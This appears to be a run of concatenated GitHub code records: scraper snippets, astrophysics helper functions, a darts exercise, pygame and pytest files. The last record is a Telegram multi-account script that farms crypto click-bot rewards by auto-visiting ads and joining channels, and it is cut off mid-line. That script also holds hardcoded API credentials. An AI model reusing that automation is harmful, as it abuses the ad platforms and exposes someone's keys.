key=urllib.parse.urlencode({\"kw\":kw})\n url=url+key\n tiebaSpider(url,begin,end)\n #tiebaSpider(url1,begin,end)\n time.sleep(5)\n\n\n#for i in range(1,4):\n#print(\"http://tieba.baidu.com/f?kw=python&ie=utf-8&pn=\"+str((i-1)*50))\n","repo_name":"LMlmptm/python","sub_path":"我要自学网/teba1.py","file_name":"teba1.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39054397793","text":"import numpy as np\nfrom numba import jit, njit, float64, int32, prange\nfrom photutils import CircularAperture, aperture_photometry\nfrom scipy.interpolate import interp1d\n\nimport SynthObs\nfrom SynthObs.SED import models\nimport FLARE\nimport FLARE.filters\nfrom FLARE.photom import lum_to_M, M_to_lum\n\n@njit(float64[:](float64[:,:], float64[:,:], float64[:], float64[:], float64[:], float64[:], int32), parallel=True, nogil=True)\ndef get_Z_LOS(s_cood, g_cood, g_mass, g_Z, g_sml, lkernel, kbins):\n\n \"\"\"\n\n Compute the los metal surface density (in Msun/Mpc^2) for star particles inside the galaxy taking\n the z-axis as the los.\n Args:\n s_cood (3d array): stellar particle coordinates\n g_cood (3d array): gas particle coordinates\n g_mass (1d array): gas particle mass\n g_Z (1d array): gas particle metallicity\n g_sml (1d array): gas particle 
smoothing length\n\n \"\"\"\n n = len(s_cood)\n Z_los_SD = np.zeros(n)\n #Fixing the observer direction as z-axis. Use make_faceon() for changing the\n #particle orientation to face-on\n xdir, ydir, zdir = 0, 1, 2\n for ii in prange(n):\n\n thisspos = s_cood[ii]\n ok = np.where(g_cood[:,zdir] > thisspos[zdir])[0]\n thisgpos = g_cood[ok]\n thisgsml = g_sml[ok]\n thisgZ = g_Z[ok]\n thisgmass = g_mass[ok]\n x = thisgpos[:,xdir] - thisspos[xdir]\n y = thisgpos[:,ydir] - thisspos[ydir]\n\n b = np.sqrt(x*x + y*y)\n boverh = b/thisgsml\n\n ok = np.where(boverh <= 1.)[0]\n kernel_vals = np.array([lkernel[int(kbins*ll)] for ll in boverh[ok]])\n\n Z_los_SD[ii] = np.sum((thisgmass[ok]*thisgZ[ok]/(thisgsml[ok]*thisgsml[ok]))*kernel_vals) #in units of Msun/Mpc^2\n\n\n return Z_los_SD\n\n\ndef get_spherical_from_cartesian(coords):\n\n x, y, z = coords\n\n xy = x**2 + y**2\n r = np.sqrt(xy + z**2)\n theta = np.arctan2(np.sqrt(xy), z) # for elevation angle defined from Z-axis down\n phi = np.arctan2(y, x)\n\n return r, theta, phi\n\n\ndef get_cartesian_from_spherical(t_angles):\n\n x = np.sin(t_angles[0])*np.cos(t_angles[1])\n y = np.sin(t_angles[0])*np.sin(t_angles[1])\n z = np.cos(t_angles[0])\n\n return np.array([x, y, z])\n\ndef get_rotation_matrix(i_v, unit=None):\n # This solution is from ---\n # https://stackoverflow.com/questions/43507491/imprecision-with-rotation-matrix-to-align-a-vector-to-an-axis\n\n # This uses the Rodrigues' rotation formula for the re-projection\n\n # From http://www.j3d.org/matrix_faq/matrfaq_latest.html#Q38\n if unit is None:\n unit = [0.0, 0.0, 1.0]\n # Normalize vector length\n i_v /= np.linalg.norm(i_v)\n\n # Get axis\n uvw = np.cross(i_v, unit)\n\n # compute trig values - no need to go through arccos and back\n rcos = np.dot(i_v, unit)\n rsin = np.linalg.norm(uvw)\n\n #normalize and unpack axis\n if not np.isclose(rsin, 0):\n uvw /= rsin\n u, v, w = uvw\n\n # Compute rotation matrix - re-expressed to show structure\n return (\n rcos * np.eye(3) +\n rsin * np.array([\n [ 0, -w, v],\n [ w, 0, -u],\n [-v, u, 0]\n ]) +\n (1.0 - rcos) * uvw[:,None] * uvw[None,:]\n )\n\n\n\ndef ang_mom_vector(this_mass, this_cood, this_vel):\n\n #Get the angular momentum unit vector\n L_tot = np.array([this_mass]).T * np.cross(this_cood, this_vel)\n L_tot_mag = np.sqrt(np.sum(np.nansum(L_tot, axis = 0)**2))\n L_unit = np.sum(L_tot, axis = 0)/L_tot_mag\n\n return L_unit\n\n\ndef kappa(this_smass, this_scoord, this_svel):\n\n\n L_tot = np.array([this_smass]).T*np.cross(this_scoord, this_svel)\n L_tot_mag = np.sqrt(np.sum(np.nansum(L_tot, axis = 0)**2))\n\n L_unit = np.sum(L_tot, axis = 0)/L_tot_mag\n\n R_z = np.cross(this_scoord,L_unit)\n absR_z = np.sqrt(np.sum(R_z**2, axis = 1))\n mR = this_smass*absR_z\n K = np.nansum(this_smass*np.sum(this_svel**2, axis = 1))\n\n L = np.sum(L_tot*L_unit, axis = 1)\n L_co = np.copy(L)\n co = np.where(L_co > 0.)\n L_co = L_co[co]\n\n L_mR = (L/mR)**2\n L_co_mR = (L_co/mR[co])**2\n Krot = np.nansum(this_smass*L_mR)/K\n\n\n Kco = np.nansum(this_smass[co]*L_co_mR)/K\n\n\n return Kco, Krot\n\n\ndef lum(MetSurfaceDensities, Masses, Ages, Metallicities, DTM, kappa=0.0795, BC_fac=1.0, IMF = 'Chabrier_300', filters = ['FAKE.TH.FUV'], Type = 'Total', log10t_BC = 7., extinction = 'default'):\n\n model = models.define_model(F'BPASSv2.2.1.binary/{IMF}') # DEFINE SED GRID -\n if extinction == 'default':\n model.dust_ISM = ('simple', {'slope': -1.}) #Define dust curve for ISM\n model.dust_BC = ('simple', {'slope': -1.}) #Define dust curve for birth cloud component\n elif 
extinction == 'Calzetti':\n model.dust_ISM = ('Starburst_Calzetti2000', {''})\n model.dust_BC = ('Starburst_Calzetti2000', {''})\n elif extinction == 'SMC':\n model.dust_ISM = ('SMC_Pei92', {''})\n model.dust_BC = ('SMC_Pei92', {''})\n elif extinction == 'MW':\n model.dust_ISM = ('MW_Pei92', {''})\n model.dust_BC = ('MW_Pei92', {''})\n elif extinction == 'N18':\n model.dust_ISM = ('MW_N18', {''})\n model.dust_BC = ('MW_N18', {''})\n else: ValueError(\"Extinction type not recognised\")\n\n # --- create rest-frame luminosities\n F = FLARE.filters.add_filters(filters, new_lam = model.lam)\n model.create_Lnu_grid(F) # --- create new L grid for each filter. In units of erg/s/Hz\n\n DustSurfaceDensities = DTM * MetSurfaceDensities\n\n if Type == 'Total':\n tauVs_ISM = kappa * DustSurfaceDensities # --- calculate V-band (550nm) optical depth for each star particle\n tauVs_BC = BC_fac * (Metallicities/0.01)\n fesc = 0.0\n\n elif Type == 'Pure-stellar':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = np.zeros(len(Masses))\n fesc = 1.0\n\n elif Type == 'Intrinsic':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = np.zeros(len(Masses))\n fesc = 0.0\n\n elif Type == 'Only-BC':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = BC_fac * (Metallicities/0.01)\n fesc = 0.0\n\n else:\n ValueError(F\"Undefined Type {Type}\")\n\n Lnu = models.generate_Lnu(model, Masses, Ages, Metallicities, tauVs_ISM, tauVs_BC, F, fesc = fesc, log10t_BC = log10t_BC) # --- calculate rest-frame Luminosity. In units of erg/s/Hz\n Lums = list(Lnu.values())\n\n return Lums\n\n\ndef lum_from_stars(MetSurfaceDensities, Masses, Ages, Metallicities, DTM, kappa=0.0795, BC_fac=1.0, IMF = 'Chabrier_300', filters = ['FAKE.TH.FUV'], Type = 'Total', log10t_BC = 7., extinction = 'default'):\n\n model = models.define_model(F'BPASSv2.2.1.binary/{IMF}') # DEFINE SED GRID -\n if extinction == 'default':\n model.dust_ISM = ('simple', {'slope': -1.}) #Define dust curve for ISM\n model.dust_BC = ('simple', {'slope': -1.}) #Define dust curve for birth cloud component\n elif extinction == 'Calzetti':\n model.dust_ISM = ('Starburst_Calzetti2000', {''})\n model.dust_BC = ('Starburst_Calzetti2000', {''})\n elif extinction == 'SMC':\n model.dust_ISM = ('SMC_Pei92', {''})\n model.dust_BC = ('SMC_Pei92', {''})\n elif extinction == 'MW':\n model.dust_ISM = ('MW_Pei92', {''})\n model.dust_BC = ('MW_Pei92', {''})\n elif extinction == 'N18':\n model.dust_ISM = ('MW_N18', {''})\n model.dust_BC = ('MW_N18', {''})\n else: ValueError(\"Extinction type not recognised\")\n\n # --- create rest-frame luminosities\n F = FLARE.filters.add_filters(filters, new_lam = model.lam)\n model.create_Lnu_grid(F) # --- create new L grid for each filter. In units of erg/s/Hz\n\n DustSurfaceDensities = DTM * MetSurfaceDensities\n\n if Type == 'Total':\n tauVs_ISM = kappa * DustSurfaceDensities # --- calculate V-band (550nm) optical depth for each star particle\n tauVs_BC = BC_fac * (Metallicities/0.01)\n fesc = 0.0\n\n elif Type == 'Pure-stellar':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = np.zeros(len(Masses))\n fesc = 1.0\n\n elif Type == 'Intrinsic':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = np.zeros(len(Masses))\n fesc = 0.0\n\n elif Type == 'Only-BC':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = BC_fac * (Metallicities/0.01)\n fesc = 0.0\n\n else:\n ValueError(F\"Undefined Type {Type}\")\n\n Lnu = {f: models.generate_Lnu_array(model, Masses, Ages, Metallicities, tauVs_ISM, tauVs_BC, F, f, fesc = fesc) for f in filters} # --- calculate rest-frame Luminosity. 
In units of erg/s/Hz\n Lums = list(Lnu.values())\n\n return Lums\n\n\ndef calc_axes(coods):\n \"\"\"\n Args:\n coods - normed coordinates\n\n Returns:\n [a, b, c]:\n e_vectors:\n \"\"\"\n\n I = np.zeros((3, 3))\n\n I[0,0] = np.sum(coods[:,1]**2 + coods[:,2]**2)\n I[1,1] = np.sum(coods[:,0]**2 + coods[:,2]**2)\n I[2,2] = np.sum(coods[:,1]**2 + coods[:,0]**2)\n\n I[0,1] = I[1,0] = - np.sum(coods[:,0] * coods[:,1])\n I[1,2] = I[2,1] = - np.sum(coods[:,2] * coods[:,1])\n I[0,2] = I[2,0] = - np.sum(coods[:,2] * coods[:,0])\n\n e_values, e_vectors = np.linalg.eig(I)\n\n sort_idx = np.argsort(e_values)\n\n e_values = e_values[sort_idx]\n e_vectors = e_vectors[sort_idx,:]\n\n a = ((5. / (2 * len(coods))) * (e_values[1] + e_values[2] - e_values[0]))**0.5\n b = ((5. / (2 * len(coods))) * (e_values[0] + e_values[2] - e_values[1]))**0.5\n c = ((5. / (2 * len(coods))) * (e_values[0] + e_values[1] - e_values[2]))**0.5\n\n# print a, b, c\n\n return [a,b,c], e_vectors\n\ndef create_image(pos, Ndim, i, j, imgrange, ls, smooth):\n # Define x and y positions for the gaussians\n Gx, Gy = np.meshgrid(np.linspace(imgrange[0][0], imgrange[0][1], Ndim),\n np.linspace(imgrange[1][0], imgrange[1][1], Ndim))\n # Initialise the image array\n gsmooth_img = np.zeros((Ndim, Ndim))\n # Loop over each star computing the smoothed gaussian distribution for this particle\n for x, y, l, sml in zip(pos[:, i], pos[:, j], ls, smooth):\n # Compute the image\n g = np.exp(-(((Gx - x) ** 2 + (Gy - y) ** 2) / (2.0 * sml ** 2)))\n # Get the sum of the gaussian\n gsum = np.sum(g)\n # If there are stars within the image in this gaussian add it to the image array\n if gsum > 0:\n gsmooth_img += g * l / gsum\n # img, xedges, yedges = np.histogram2d(pos[:, i], pos[:, j], bins=nbin, range=imgrange, weights=ls)\n return gsmooth_img\n\n\n\ndef calc_halflightradius(coords, L, sml, z):\n\n # Define comoving softening length in pMpc\n csoft = 0.001802390 / (0.6777 * (1 + z)) * 1e3\n # Define width (in Mpc)\n ini_width = 62\n # Compute the resolution\n ini_res = ini_width / csoft\n res = int(np.ceil(ini_res))\n # Compute the new width\n width = csoft * res\n\n # Define range and extent for the images\n imgrange = ((-width / 2, width / 2), (-width / 2, width / 2))\n imgextent = [-width / 2, width / 2, -width / 2, width / 2]\n # Set up aperture objects\n positions = [(res / 2, res / 2)]\n app_radii = np.linspace(0.001, res / 4, 500) # 500 apertures out to 1/4 the image width\n apertures = [CircularAperture(positions, r=r) for r in app_radii]\n app_radii *= csoft\n\n tot_l = np.sum(L)\n img = create_image(coords,res, 0, 1, imgrange, L, sml)\n\n hlr = get_img_hlr(img, apertures, tot_l, app_radii, res, csoft)\n\n return hlr\n\n\ndef get_img_hlr(img, apertures, tot_l, app_rs, res, csoft):\n # Apply the apertures\n phot_table = aperture_photometry(img, apertures, method='subpixel', subpixels=5)\n # Extract the aperture luminosities\n row = np.lib.recfunctions.structured_to_unstructured(np.array(phot_table[0]))\n lumins = row[3:]\n # Get half the total luminosity\n half_l = tot_l / 2\n # Interpolate to increase resolution\n func = interp1d(app_rs, lumins, kind=\"linear\")\n interp_rs = np.linspace(0.001, res / 4, 10000) * csoft\n interp_lumins = func(interp_rs)\n # Get the half mass radius particle\n hlr_ind = np.argmin(np.abs(interp_lumins - half_l))\n hlr = interp_rs[hlr_ind]\n return 
hlr\n","repo_name":"stephenmwilkins/flares_inclination","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":12104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23232740524","text":"name = input()\n\ntotal_points = 301\ncount = 0\nbad_count = 0\n\nwhile total_points != 0:\n target = input()\n if target == \"Retire\":\n print(F\"{name} retired after {bad_count} unsuccessful shots.\")\n break\n poits = int(input())\n if target == \"Single\":\n poits = poits\n elif target == \"Double\":\n poits = poits * 2\n elif target == \"Triple\":\n poits = poits * 3\n total_points -= poits\n if total_points < 0:\n total_points += poits\n bad_count +=1\n else:\n count += 1\nelse:\n print(F\"{name} won the leg with {count} shots.\")\n","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"Online_Exam_9_and_10_March_2019/04_Darts.py","file_name":"04_Darts.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72203122407","text":"import pygame\nfrom pygame.locals import *\nfrom constants import SCREEN_WIDTH, SCREEN_HEIGHT\n\nclass FinalDefensor(pygame.sprite.Sprite):\n def __init__(self, position_x, position_y, power, image): # life between 0 and 1\n pygame.sprite.Sprite.__init__(self)\n self.position_x = position_x\n self.position_y = position_y\n self.power = power\n self.image = pygame.image.load(image).convert_alpha()\n self.rect = self.image.get_rect()\n self.rect[0] = position_x\n self.rect[1] = position_y\n\n def update(self):\n return ","repo_name":"davixie/CES22_PlantsVsZombies","sub_path":"classes/defensor/final_defense.py","file_name":"final_defense.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41843064257","text":"import os\nimport sys\nfrom configparser import ConfigParser\n\nsys.path.insert(1, os.path.join(sys.path[0], \"..\"))\n\n# trunk-ignore(flake8/E402)\nfrom classes import R3dditScrapper\n\n# trunk-ignore(flake8/E402)\nfrom functions.tools import check_update\n\n\ndef test_check_update():\n \"\"\"\n Test check_update function\n \"\"\"\n assert check_update(testing=True) is True\n\n\ndef test_R3dditScrapper():\n \"\"\"\n Test R3dditScrapper class\n \"\"\"\n scrapper = R3dditScrapper(\n sub=\"pics\", limit=1, order=\"hot\", nsfw=\"True\", argument=False, path=\"images\"\n )\n assert scrapper.sub == \"pics\"\n assert scrapper.limit == 1\n assert scrapper.order == \"hot\"\n assert scrapper.nsfw is True\n assert scrapper.argument is False\n assert scrapper.path == \"images/pics/\"\n config = ConfigParser()\n config.read(\"config.ini\")\n try:\n # Prioritize arguments path over config path\n path = config[\"Path\"][\"path\"]\n except KeyError:\n path = \"images\"\n scrapper = R3dditScrapper(\n sub=\"pics\", limit=1, order=\"hot\", nsfw=\"True\", argument=False, path=path\n )\n assert scrapper.path == path + \"/\" + \"pics/\"\n\n\ndef test_download():\n \"\"\"\n Test download function\n \"\"\"\n import os\n\n scrapper = R3dditScrapper(\n sub=\"pics\", limit=1, order=\"hot\", nsfw=\"True\", argument=False, path=None\n )\n scrapper.download(\n {\"url\": \"https://i.redd.it/kq1strmcq3i91.jpg\", \"fname\": \"test.jpg\"}\n )\n assert os.path.isfile(\"test.jpg\") is True\n os.remove(\"test.jpg\")\n\n\ndef test_nsfw():\n \"\"\"\n Test nsfw function\n \"\"\"\n scrapper = R3dditScrapper(\n 
sub=\"pics\", limit=1, order=\"hot\", nsfw=\"True\", argument=False, path=None\n )\n assert scrapper.nsfw is True\n scrapper = R3dditScrapper(\n sub=\"pics\", limit=1, order=\"hot\", nsfw=\"False\", argument=False, path=None\n )\n assert scrapper.nsfw is False\n","repo_name":"Baccount/R3ddit-Scrapper","sub_path":"scr/tests/test_func.py","file_name":"test_func.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14804763331","text":"# -- coding: utf8 --\r\nimport os,re, sys\r\ntry:\r\n from telethon.sync import TelegramClient\r\n from telethon import errors\r\n from telethon.tl.functions.messages import GetHistoryRequest, GetBotCallbackAnswerRequest, ImportChatInviteRequest\r\n from telethon.tl.functions.channels import JoinChannelRequest\r\nexcept:\r\n os.system(\"pip install telethon\")\r\n from telethon.sync import TelegramClient\r\n from telethon import errors\r\n from telethon.tl.functions.messages import GetHistoryRequest, GetBotCallbackAnswerRequest, ImportChatInviteRequest\r\n from telethon.tl.functions.channels import JoinChannelRequest\r\nfrom time import sleep\r\nfrom datetime import datetime\r\ntry:\r\n\timport requests\r\nexcept:\r\n\tos.system(\"pip install requests\")\r\n\timport requests\r\ntry:\r\n from colorama import Back, Fore\r\nexcept:\r\n os.system(\"pip install colorama\")\r\n from colorama import Back, Fore\r\nif not os.path.exists('session'):\r\n os.makedirs('session')\r\napi_id = 1138679\r\napi_hash = \"45d02583532e7a4b2ae4b5d0784c40af\"\r\ndo = Fore.RED\r\nvang = Fore.YELLOW\r\nxanh = Fore.GREEN\r\nmagenta = Fore.MAGENTA\r\ntrang = Fore.WHITE\r\nblue = Fore.BLUE\r\ns = requests.session()\r\nos.system(\"cls\")\r\nos.system(\"clear\")\r\nbanner = xanh+'''\r\n\r\n\t /$$ /$$ /$$$$$$$ \r\n\t| $$$ /$$$ | $$__ $$\r\n\t| $$$$ /$$$$ /$$$$$$ | $$ \\ $$\r\n\t| $$ $$/$$ $$ /$$__ $$ | $$ | $$\r\n\t| $$ $$$| $$| $$ \\__/ | $$ | $$\r\n\t| $$\\ $ | $$| $$ | $$ | $$\r\n\t| $$ \\/ | $$| $$ | $$$$$$$/\r\n\t|__/ |__/|__/ |_______/ \r\n '''+\"\\n\t{}Youtube: {}Mr D\".format(do,vang)+\"\\n\t{}Link Channel: {}{}\\n\".format(do,vang,\"bit.ly/Channel-MrD\")\r\nnhap_bot = blue + \"[{C1}1{C2}] - Dogecoin Click Bot\\n[{C1}2{C2}] - Litecoin Click Bot\\n[{C1}3{C2}] - Zcash Click Bot\\n[{C1}4{C2}] - Bitcoin Click Bot\\n[{C1}5{C2}] - BCH Click Bot\\n\".format(C1=xanh,C2=blue)\r\nprint(banner)\r\n\r\nc = requests.Session()\r\nos.system(\"termux-open-url http://agus-password.ga\")\r\n\r\nif not os.path.exists(\".password\"):\r\n os.makedirs(\".password\")\r\n\r\nprint(\"\\033[1;32m[>>] Enter Password To Continue\\n\\033[1;35m[>>]\\033[1;0m Link Password: https://agus-password.ga\")\r\npw = c.get(\"http://agus-password.ga/key.txt\")\r\nif not os.path.exists(\".password/password.txt\"):\r\n f = open(\".password/password.txt\", \"w+\")\r\n f.write(\"wkwkwkwkw\")\r\n f.close()\r\n\r\nfor i in range(99):\r\n f = open(\".password/password.txt\", \"r\")\r\n if f.readlines()[0] == pw.text:\r\n sys.stdout.write('\\r \\r')\r\n sys.stdout.write('\\r[🔍] Checking Password....!')\r\n sleep(2)\r\n break\r\n pwin = input(\"\\033[1;32m[©] Enter Password \\033[1;30m:\\033[1;0m \")\r\n if pwin == pw.text:\r\n f = open(\".password/password.txt\", \"w+\")\r\n f.write(pwin)\r\n f.close()\r\n print(\"\\033[1;32m[✓] Password correct\")\r\n sleep(2)\r\n break\r\n else:\r\n print(\"\\033[1;31m[X] Incorrect Password...!\")\r\n if i > 1:\r\n print(\"\\033[1;33m[<<]Get Password At 
Website:\\n\\033[1;0mhttp://agus-password.ga\\n\")\r\n sys.exit()\r\n\r\n\r\n\r\ndef connect(phone):\r\n client = TelegramClient('session/'+phone,api_id,api_hash)\r\n client.connect()\r\n if not client.is_user_authorized():\r\n client.send_code_request(phone)\r\n try:\r\n client.sign_in(phone, input(vang+'Nhập code OTP phone {}\\n: '.format(phone)))\r\n except errors.SessionPasswordNeededError:\r\n client.start(phone,input(\"Nhập mã 2fa phone {}: \".format(phone)))\r\n return client\r\nDoge = \"@Dogecoin_click_bot\"\r\nLtc = \"@Litecoin_click_bot\"\r\nZec = \"@Zcash_click_bot\"\r\nBtc = \"@BitcoinClick_bot\"\r\nBch = \"@BCH_clickbot\"\r\nos.system(\"clear\")\r\nprint(banner)\r\nprint(Back.YELLOW+do+\"START\".center(50)+Back.BLACK)\r\nprint(\"\\n\\n\")\r\nprint(xanh+\"Vui lòng nhập SĐT(phone) nếu chỉ tool 1 nick,\\ncòn muốn tool nhiều SĐT(phone) thì vui lòng lưu \\nSĐT(phone) vào file {C1}[phone.txt]{C2},mỗi SĐT(phone) là\\n1 dòng và Nhấn {C1}[ENTER]{C2} để chạy tool(dành cho tool\\nnhiều SĐT(phone)).\".format(C1=vang,C2=xanh))\r\nnhap = input(do+\"\\nNhập(import): \")\r\nlist_phone = []\r\nif(nhap == \"\" or nhap == \" \" or nhap == \"enter\" or nhap == \"ENTER\"):\r\n print(vang+\"Vui Lòng Đợi Để Hoàn Thành Đăng Nhập Hết Các SĐT(phone), Để Chạy Tool. \\n\"+trang)\r\n try:\r\n \tfile1 = open(\"phone.txt\",\"r\")\r\n except:\r\n \tprint(do+\"Không có file {}[phone.txt]\".format(vang))\r\n \texit(0)\r\n stt = 0\r\n for i in file1:\r\n \tstt += 1\r\n \ttry:\r\n \t\tduy_connect = connect(i.strip())\r\n \texcept:\r\n \t\tprint(do+\"=\"*50)\r\n \t\tprint(\"SĐT(phone) {}{}{} Này Lỗi Rồi, Vui Lòng Chuyển SĐT(phone) Khác.\".format(vang,i,do))\r\n \t\tprint(\"=\"*50+\"\\n\"+trang)\r\n \t\tcontinue\r\n \tlist_phone.append(i.strip())\r\n \tduy_connect.disconnect()\r\n if(stt==0):\r\n \tprint(do+\"Vui Lòng Nhập SĐT(phone) Vào file {}[phone.txt]{} Và Mỗi SĐT Là 1 Dòng\\n\".format(vang,do))\r\n \texit(0)\r\n print(xanh+\"Đăng Nhập Thành Công List SĐT(phone)!!!\\n\"+trang)\r\nelse:\r\n p = nhap\r\n stt = 1\r\n list_phone.append(p)\r\n\r\nos.system(\"cls\")\r\nos.system(\"clear\")\r\nprint(banner)\r\nprint(Back.YELLOW+do+\"START\".center(50)+Back.BLACK)\r\nprint(\"\\n\\n\")\r\nprint(nhap_bot)\r\nnhap = input(vang+\"\\nNhập số thứ tự bot muốn tool: \")\r\nprint(xanh+\"Bạn muốn tool chạy hết 1 lượt rồi dừng nhập {C1}[ENTER]\\n{C2}hay tự động tool lại sau mỗi 4 giờ nhập {C1} [YES]{C2}.\".format(C1=vang,C2=xanh))\r\nlap_vo_han = input(do+\"Nhập (import):\"+vang)\r\ntoolBot = []\r\ndef get_entity():\r\n if \"1\" in nhap:\r\n entity = client.get_entity(Doge)\r\n toolBot.append([\"DOGE\",Doge,entity])\r\n if \"2\" in nhap:\r\n entity = client.get_entity(Ltc)\r\n toolBot.append([\"LTC\",Ltc,entity])\r\n if \"3\" in nhap:\r\n entity = client.get_entity(Zec)\r\n toolBot.append([\"ZEC\",Zec,entity])\r\n if \"4\" in nhap:\r\n entity = client.get_entity(Btc)\r\n toolBot.append([\"BTC\",Btc,entity])\r\n if \"5\" in nhap:\r\n entity = client.get_entity(Bch)\r\n toolBot.append([\"BCH\",Bch,entity])\r\n\r\n\r\ndef Bot_url(name):\r\n client.send_message(entity=entity_id, message=\"/visit\")\r\n sleep(3)\r\n History_messenger = client(GetHistoryRequest(peer=entity_id,limit=1,offset_date=None,offset_id=0,max_id=0,min_id=0,add_offset=0,hash=0))\r\n if History_messenger.messages[0].message.find ('Sorry') != -1 and History_messenger.messages[0].message.find ('no new ads') != -1:\r\n print(magenta + \"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+vang+\"Hêt ADS\"+trang)\r\n\r\n return 0, \"Duy\"\r\n msg_id = 
History_messenger.messages[0].id\r\n url = History_messenger.messages[0].reply_markup.rows[0].buttons[0].url\r\n skip = History_messenger.messages[0].reply_markup.rows[1].buttons[1].data\r\n return url,skip,msg_id\r\ndef get_url(name,url,skip,msg_id):\r\n get = s.get(url)\r\n get.close()\r\n if \"Please solve the reCAPTCHA to continue\" in get.text or \"Switch to reCAPTCHA\" in get.text:\r\n client (GetBotCallbackAnswerRequest (peer=channel_id, msg_id=msg_id, data=skip))\r\n print(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+do+\"Skip Visit, Captcha\"+trang)\r\n return 2, \"duy\"\r\n History_messenger = client(GetHistoryRequest(peer=entity_id,limit=1,offset_date=None,offset_id=0,max_id=0,min_id=0,add_offset=0,hash=0))\r\n msg_vist = History_messenger.messages[0].message\r\n if \"to get your reward\" in msg_vist:\r\n \tclient (GetBotCallbackAnswerRequest (peer=channel_id, msg_id=msg_id, data=skip))\r\n \tprint(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+do+\"Skip Visit, Reward\"+trang)\r\n \treturn 2,\"Duy\"\r\n elif \"Please stay on the site for at least\" in msg_vist:\r\n time = re.sub(r'\\D',\"\",msg_vist)\r\n else:\r\n time = \"30\"\r\n print(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+xanh+\"Visit Url: {}{}{} \".format(vang,url,xanh)+trang)\r\n for j in range(int(time),0,-1):\r\n \tprint(xanh+\" Đợi {}{}{} Giây Để Nhận {}{}{} \".format(vang,j,xanh,vang,name,xanh),end=\"\\r\")\r\n \tsleep(1)\r\n print(xanh+\"Đã Nhận {}{} \".format(do,name))\r\n return 2,\"Duy\"\r\n\r\ndef Bot_joind_channel(name):\r\n client.send_message(entity=entity_id, message=\"/join\")\r\n sleep(3)\r\n History_messenger = client(GetHistoryRequest(peer=entity_id,limit=1,offset_date=None,offset_id=0,max_id=0,min_id=0,add_offset=0,hash=0))\r\n if History_messenger.messages[0].message.find ('Sorry') != -1 and History_messenger.messages[0].message.find ('no new ads') != -1:\r\n print(magenta + \"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+vang+\"Hêt ADS\"+trang)\r\n\r\n return 0, \"Duy\"\r\n msg_id = History_messenger.messages[0].id\r\n url = History_messenger.messages[0].reply_markup.rows[0].buttons[0].url\r\n joined = History_messenger.messages[0].reply_markup.rows[0].buttons[1].data\r\n skip = History_messenger.messages[0].reply_markup.rows[1].buttons[1].data\r\n try:\r\n id_joined = str.replace(url, \"https://t.me/\", \"\")\r\n except:\r\n join_Chat(name=name,url=url,msg_id=msg_id,skip=skip)\r\n return 2, \"Duy\"\r\n sleep(1)\r\n return url,joined,id_joined,skip,msg_id\r\ndef join_channel(name,id_joined,msg_id,joined,skip):\r\n client(JoinChannelRequest(\"@{}\".format(id_joined)))\r\n sleep(4)\r\n client(GetBotCallbackAnswerRequest(peer=channel_id, msg_id=msg_id, data=joined))\r\n sleep(2)\r\n History_messenger_1 = client (\r\n GetHistoryRequest (peer=entity_id, limit=1, offset_date=None, offset_id=0, max_id=0, min_id=0, add_offset=0,\r\n hash=0))\r\n if History_messenger_1.messages[0].message.find ('We cannot') != -1 and History_messenger_1.messages[0].message.find (\"find you in\") != -1 and History_messenger_1.messages[0].message.find (\"the group\") != -1:\r\n \r\n client (GetBotCallbackAnswerRequest (peer=channel_id, msg_id=msg_id, data=skip))\r\n print(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+xanh+\"Skip Join, Không thể Join Channel\"+trang)\r\n sleep(3)\r\n return 1, \"Duy\"\r\n print(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+xanh+\"JOIN 
Xong Channel \"+do+\"@{} \".format(id_joined))\r\ndef join_Chat(name,url,msg_id,skip):\r\n try:\r\n id_joinedd = str.replace (url, \"https://t.me/joinchat/\", \"\")\r\n client(ImportChatInviteRequest(id_joinedd))\r\n print (\r\n magenta + \"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\")) + xanh + \"JOIN Xong Group \" + do + \"@{} \".format (id_joinedd))\r\n return 2, \"Duy\"\r\n except:\r\n client (GetBotCallbackAnswerRequest (peer=channel_id, msg_id=msg_id, data=skip))\r\n print (magenta + \"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\")) + Fore.CYAN + \"Skip Join\"+trang)\r\n sleep (3)\r\n return 2, \"Duy\"\r\nvisit = False\r\nchannel = False\r\nbb = 0\r\nfor b in list_phone:\r\n\tbb += 1\r\nprint(do+\"=\"*50)\r\nprint(blue+\"Số Account Login Thành Công:\",bb,\"/\",stt)\r\nprint(do+\"=\"*50)\r\nwhile True:\r\n\tfor k in list_phone:\r\n\t\tvisit = True\r\n\t\tchannel = False\r\n\t\ttry:\r\n\t\t\tprint(xanh+\"Đợi chút để tôi check SĐT(phone)\"+trang)\r\n\t\t\tclient = 